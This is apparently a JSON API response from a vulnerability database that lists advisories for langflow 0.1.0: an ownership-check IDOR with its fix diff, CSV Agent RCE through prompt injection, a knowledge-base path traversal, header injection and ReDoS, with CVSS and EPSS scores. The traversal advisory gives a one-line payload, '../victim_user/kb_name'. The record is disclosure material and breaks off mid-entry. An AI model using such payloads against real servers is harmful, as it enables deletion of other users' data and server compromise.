Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/41605?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/41605?format=api", "purl": "pkg:pypi/langflow@0.1.0", "type": "pypi", "namespace": "", "name": "langflow", "version": "0.1.0", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "1.9.1", "latest_non_vulnerable_version": "1.9.1", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91746?format=api", "vulnerability_id": "VCID-1dek-kvzf-27d1", "summary": "Langflow: Authenticated Users Can Read, Modify, and Delete Any Flow via Missing Ownership Check\n## Vulnerability\n\n### IDOR in `GET/PATCH/DELETE /api/v1/flow/{flow_id}`\n\nThe `_read_flow` helper in `src/backend/base/langflow/api/v1/flows.py` branched on the `AUTO_LOGIN` setting to decide whether to filter by `user_id`. When `AUTO_LOGIN` was `False` (i.e., authentication was enabled), neither branch enforced an ownership check — the query returned any flow matching the given UUID regardless of who owned it.\n\nThis exposed any authenticated user to:\n\n- **Read** any other user's flow, including embedded plaintext API keys\n- **Modify** the logic of another user's AI agents\n- **Delete** flows belonging to other users\n\nThe vulnerability was introduced by the conditional logic that was meant to accommodate public/example flows (those with `user_id = NULL`) under auto-login mode, but inadvertently left the authenticated path without an ownership filter.\n\n---\n\n## Fix (PR #8956)\n\nThe fix removes the `AUTO_LOGIN` conditional entirely and unconditionally scopes the query to the requesting user:\n\n```diff\n- auth_settings = settings_service.auth_settings\n- stmt = select(Flow).where(Flow.id == flow_id)\n- if auth_settings.AUTO_LOGIN:\n- stmt = stmt.where(\n- (Flow.user_id == user_id) | (Flow.user_id == None) # noqa: E711\n- )\n+ stmt = select(Flow).where(Flow.id == flow_id).where(Flow.user_id == user_id)\n```\n\nAll three operations — read, update, and delete — route through `_read_flow`, so the single change covers the full attack surface. A cross-user isolation test (`test_read_flows_user_isolation`) was added to prevent regression.\n\n---\n\n## Acknowledgements\n\nLangflow thanks the security researcher who responsibly disclosed this vulnerability:\n\n- **[@chximn-dt](https://github.com/chximn-dt)**", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34046", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00052", "scoring_system": "epss", "scoring_elements": "0.16672", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34046" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/pull/8956", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:05Z/" } ], "url": "https://github.com/langflow-ai/langflow/pull/8956" }, { "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-8c4j-f57c-35cf", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:05Z/" } ], "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-8c4j-f57c-35cf" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34046", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34046" }, { "reference_url": "https://github.com/advisories/GHSA-8c4j-f57c-35cf", "reference_id": "GHSA-8c4j-f57c-35cf", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-8c4j-f57c-35cf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/46615?format=api", "purl": "pkg:pypi/langflow@1.5.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1ynd-c2hz-53hx" }, { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-2649-thqq-r3d2" }, { "vulnerability": "VCID-4swq-hbjm-3ucd" }, { "vulnerability": "VCID-bb6r-1f6u-t7ed" }, { "vulnerability": "VCID-ncvf-vzqr-uydz" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-qwtw-q92t-quhz" }, { "vulnerability": "VCID-rc54-gw71-gyau" }, { "vulnerability": "VCID-rrva-95s5-kbcf" }, { "vulnerability": "VCID-sbea-kkfu-akgb" }, { "vulnerability": "VCID-u8mw-7znw-rfab" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" }, { "vulnerability": "VCID-ysnc-jyxb-6qcy" }, { "vulnerability": "VCID-zqwj-45w7-7kft" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.5.1" } ], "aliases": [ "CVE-2026-34046", "GHSA-8c4j-f57c-35cf" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1dek-kvzf-27d1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50432?format=api", "vulnerability_id": "VCID-1ynd-c2hz-53hx", "summary": "Langflow has Remote Code Execution in CSV Agent\nThe CSV Agent node in Langflow hardcodes `allow_dangerous_code=True`, which automatically exposes LangChain’s Python REPL tool (`python_repl_ast`). As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection, leading to full Remote Code Execution (RCE).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27966", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.41016", "scoring_system": "epss", "scoring_elements": "0.97466", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27966" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/commit/d8c6480daa17b2f2af0b5470cdf5c3d28dc9e508", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-02-27T14:15:24Z/" } ], "url": "https://github.com/langflow-ai/langflow/commit/d8c6480daa17b2f2af0b5470cdf5c3d28dc9e508" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27966", "reference_id": "CVE-2026-27966", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27966" }, { "reference_url": "https://github.com/advisories/GHSA-3645-fxcv-hqr4", "reference_id": "GHSA-3645-fxcv-hqr4", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3645-fxcv-hqr4" }, { "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-3645-fxcv-hqr4", "reference_id": "GHSA-3645-fxcv-hqr4", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-02-27T14:15:24Z/" } ], "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-3645-fxcv-hqr4" } ], "fixed_packages": [], "aliases": [ "CVE-2026-27966", "GHSA-3645-fxcv-hqr4" ], "risk_score": 10.0, "exploitability": "2.0", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1ynd-c2hz-53hx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93673?format=api", "vulnerability_id": "VCID-2195-gd33-xbdp", "summary": "Langflow Knowledge Bases API is Vulnerable to Path Traversal\n## Summary\nLangflow is vulnerable to Path Traversal in the Knowledge Bases API (`DELETE /api/v1/knowledge_bases`). This occurs because user-supplied knowledge base names are concatenated directly into file paths without proper sanitization or boundary validation. An authenticated attacker can exploit this flaw to delete arbitrary directories anywhere on the server's filesystem, leading to data loss and potential service disruption.\n\n## Details\nThe vulnerability exists in the `delete_knowledge_bases_bulk` function within `src/backend/base/langflow/api/v1/knowledge_bases.py`. \n\nThis function constructs file paths directly from the user-supplied `kb_names` parameter. While other knowledge base endpoints safely route through standard path resolution (e.g., `_resolve_kb_path()`), the bulk delete handler bypasses this entirely. It builds the path manually and passes it directly to `shutil.rmtree()` without validating if the resulting path resolves outside the intended user directory.\n\n## PoC (Proof of Concept)\nFor the **Bulk Delete** endpoint, an authenticated attacker can supply a traversal sequence in the `kb_names` parameter:\n`../victim_user/kb_name`\n\nBecause the path is passed directly to `shutil.rmtree()` without containment checks, this payload deletes directories outside the intended scope.\n\n## Impact\nAny Langflow instance exposing this endpoint to authenticated users is vulnerable. This exposes the server to:\n* **Cross-user data compromise:** Deletion of directories within another tenant's knowledge base space.\n* **Arbitrary filesystem manipulation:** Directory deletion at any path on the server where the application has write permissions.\n* **Service disruption & Data Loss:** Deletion of critical application files or unrecoverable data loss if backups are co-located on the same filesystem.\n\n## Fixes\nThe issue was addressed in **PR #12243**, which applies `Path.resolve()` to normalize the supplied path and validates that it starts with the authenticated user's directory before deletion. Subsequent updates (backported from PR #12337) introduced robust containment checks using `Path.is_relative_to()` to prevent prefix-ambiguity bugs.\n\n## Acknowledgements\nThanks to the security researchers who responsibly disclosed this vulnerability:\n* @ddlxstudio\n* @nekros1xx", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42048", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03446", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42048" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-9whx-c884-c68q", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T14:13:40Z/" } ], "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-9whx-c884-c68q" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42048", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42048" }, { "reference_url": "https://github.com/advisories/GHSA-9whx-c884-c68q", "reference_id": "GHSA-9whx-c884-c68q", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-9whx-c884-c68q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48845?format=api", "purl": "pkg:pypi/langflow@1.9.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ypxh-x2hy-3uhb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.9.0" } ], "aliases": [ "CVE-2026-42048", "GHSA-9whx-c884-c68q" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2195-gd33-xbdp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89031?format=api", "vulnerability_id": "VCID-2649-thqq-r3d2", "summary": "Langflow vulnerable to injection\nA vulnerability was detected in langflow-ai langflow up to 1.8.3. The impacted element is the function get_client_ip/install_mcp_config of the file src/backend/base/langflow/api/v1/mcp_projects.py of the component Model Context Protocol Configuration API. Performing a manipulation of the argument X-Forwarded-For results in injection. The attack may be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-6599", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16853", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-6599" }, { "reference_url": "https://gist.github.com/chenhouser2025/a909c47316b7a0948ee68c109ab747a3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:W/RC:UR" }, { "value": "6.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R" }, { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R" }, { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:24:29Z/" } ], "url": "https://gist.github.com/chenhouser2025/a909c47316b7a0948ee68c109ab747a3" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6599", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6599" }, { "reference_url": "https://vuldb.com/submit/791922", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:W/RC:UR" }, { "value": "6.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R" }, { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R" }, { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:24:29Z/" } ], "url": "https://vuldb.com/submit/791922" }, { "reference_url": "https://vuldb.com/vuln/358234", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:W/RC:UR" }, { "value": "6.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R" }, { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:24:29Z/" } ], "url": "https://vuldb.com/vuln/358234" }, { "reference_url": "https://vuldb.com/vuln/358234/cti", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:W/RC:UR" }, { "value": "6.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R" }, { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:24:29Z/" } ], "url": "https://vuldb.com/vuln/358234/cti" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*" }, { "reference_url": "https://github.com/advisories/GHSA-v66p-f7x3-4794", "reference_id": "GHSA-v66p-f7x3-4794", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-v66p-f7x3-4794" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48844?format=api", "purl": "pkg:pypi/langflow@1.8.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-4swq-hbjm-3ucd" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-rrva-95s5-kbcf" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.8.4" } ], "aliases": [ "CVE-2026-6599", "GHSA-v66p-f7x3-4794" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2649-thqq-r3d2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/55904?format=api", "vulnerability_id": "VCID-9k4q-zwxf-euh1", "summary": "Inefficient Regular Expression Complexity in langflow\nA vulnerability classified as problematic was found in Langflow up to 1.0.18. Affected by this vulnerability is an unknown functionality of the file \\src\\backend\\base\\langflow\\interface\\utils.py of the component HTTP POST Request Handler. The manipulation of the argument remaining_text leads to inefficient regular expression complexity. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-9277", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0017", "scoring_system": "epss", "scoring_elements": "0.38017", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-9277" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/blob/main/src/backend/base/langflow/interface/utils.py#L65", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/blob/main/src/backend/base/langflow/interface/utils.py#L65" }, { "reference_url": "https://rumbling-slice-eb0.notion.site/Remote-Redos-in-https-github-com-langflow-ai-langflow-067159ced0d5494e91b06071384969c4?pvs=4", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv2", "scoring_elements": "AV:A/AC:M/Au:S/C:N/I:N/A:P" }, { "value": "3.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "3.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-27T15:01:06Z/" } ], "url": "https://rumbling-slice-eb0.notion.site/Remote-Redos-in-https-github-com-langflow-ai-langflow-067159ced0d5494e91b06071384969c4?pvs=4" }, { "reference_url": "https://vuldb.com/?ctiid.278659", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv2", "scoring_elements": "AV:A/AC:M/Au:S/C:N/I:N/A:P" }, { "value": "3.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "3.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-27T15:01:06Z/" } ], "url": "https://vuldb.com/?ctiid.278659" }, { "reference_url": "https://vuldb.com/?id.278659", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv2", "scoring_elements": "AV:A/AC:M/Au:S/C:N/I:N/A:P" }, { "value": "3.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "3.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-27T15:01:06Z/" } ], "url": "https://vuldb.com/?id.278659" }, { "reference_url": "https://vuldb.com/?submit.410043", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv2", "scoring_elements": "AV:A/AC:M/Au:S/C:N/I:N/A:P" }, { "value": "3.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "3.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": 